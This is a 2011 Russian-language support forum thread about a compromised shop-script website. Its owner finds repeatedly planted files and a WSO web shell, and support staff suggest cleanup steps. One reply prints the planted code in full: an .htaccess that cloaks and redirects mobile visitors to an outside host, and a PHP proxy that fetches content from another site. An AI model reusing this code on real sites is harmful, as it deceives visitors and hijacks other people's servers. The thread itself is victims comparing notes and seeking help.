gillina 0 Опубликовано 15 ноября, 2011 Жалоба Share Опубликовано 15 ноября, 2011 Добрый день. Проблема появилась в августе, на тот момент стояла версия шопа 1.61, на сервер каким то образом добавили 2 посторонних файла .htaccess и index.php в каталог excel . После, чего по ссылке мой сайт/excel/index.php открывался совсем посторонний сайт с пиратским контентом. К тому же кто то данные ссылки начал в виде спама раскидывать по различным форумам. Первое, что я подумал это вирус на компьютере, но полная проверка касперским не нашла не одного вируса, так же не нашлось вирусов и в файлах самого сайта. Обратился к хостеру (hosting.nic.ru), ответ пришёл, что проблем они не видят. После чего запросил логи фтп за последние 3 месяца. В логах я не обнаружил подключений к каталогу excel . Я удалили посторонние файлы, сменил все возможные пароли, удалил фтп аккаунт, но проблема повторилась через некоторое время, только в этот раз спамер добавил в корневую папку сайта каталог etc с теме же файлами .htaccess и index.php и опять мой сайт выступал в роли донора пиратского сайта. Я снова сделал запрос логов за последние 3 месяца и опять не обнаружил в них ни создание каталога etc ни подключений к нему, а хостер опять разводит руками мол ищите у себя вирусы и дыры. К тому же я заметил, что последние изменение каталога etc стоит 27.01.2011, а это дата первой загрузки файлов на сервер, это мне показалась странным, так как данный каталог появился в октябре. И вот на днях опять обнаружил левые файлы .htaccess и filter.php в каталоге filters. Логи пока что не запрашивал, по фтп клиенту видно, что последние изменение каталога filters стоит дата 27.01.2011 . Вирусов по прежнему не обнаружено. Домен магазина явно попал спам базу, в нём постоянно регистрируются роботы. Как только удаляю их, в течении 1-2 часов появляются новые. В данный момент обновился до 1.65 и ищу решение данный проблемы. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 15 ноября, 2011 Жалоба Share Опубликовано 15 ноября, 2011 Здравствуйте! Хорошо, что обновились, в текйщей версии дырок нет. Но теперь нужно найти все посторонние файлы, что были загружены ранее, через них и ломают, т.е. дырок-то нет, но файлы (shell'ы) были загружены ранее, до обновления и они наверняка сидят на месте. Папку excel вообще можете удалить, она в 1.65 не используется. Обычно файлы поторонние в корневой папке, в /images папке, в /admin/images В /images папках по умолчанию есть файл .htaccess, который запрещает выполнение php, если у Вас нет .htaccess в этих папках, обязательно возьмите из архива с магазином и перепишите к себе. Ссылка на сообщение Поделиться на другие сайты
gillina 0 Опубликовано 15 ноября, 2011 Автор Жалоба Share Опубликовано 15 ноября, 2011 В /images файл .htaccess лежит такой же как и в архиве с 1.65 Вроде как нашёл файл через который добавляли левые файлы на сервер, он лежал - мой сайт/images/a8249d.php.24121 Когда вбил данный адрес в браузер, был крайне удивлён увиденным, открылся файловый менеджер в котором можно делать с файлами сайта всё, что угодно. В заголовке страницы написано WSO 2.5 Буду искать ещё. Ссылка на сообщение Поделиться на другие сайты
YuraS 4 Опубликовано 15 ноября, 2011 Жалоба Share Опубликовано 15 ноября, 2011 тоже находил у себя папку filters/HACK_default. сегодня залили. версия 1.56. содержимое файла htaccess: RewriteEngine On RewriteBase /filters/default RewriteRule index.php.* - [L] RewriteRule ^(.*) index.php?id=$1 RewriteEngine on RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR] RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR] RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !ipad [NC] RewriteCond %{HTTP_USER_AGENT} !iphone [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteRule ^(.*)$ http://updown.ipby.ru/bzz/show.php?p=3 [L,R=302] [/CODE] содержимое файла index.php: [CODE] <? $id = $_REQUEST['id']; $html = implode('', file ('http://bulgaria-sun.ru/netcat/modules/netshop/meta/'.$id)); if (strstr($id, ".css")){ header('Content-Type: text/css; charset=windows-1251'); } else { header('Content-Type: text/html; charset=windows-1251'); } echo $html; ?> Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 15 ноября, 2011 Жалоба Share Опубликовано 15 ноября, 2011 Вообще странно, почему выполнился php код, по идее, должен не выполняться. Yurassik1 Вообще, в текущей версии уже нет папки filters. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения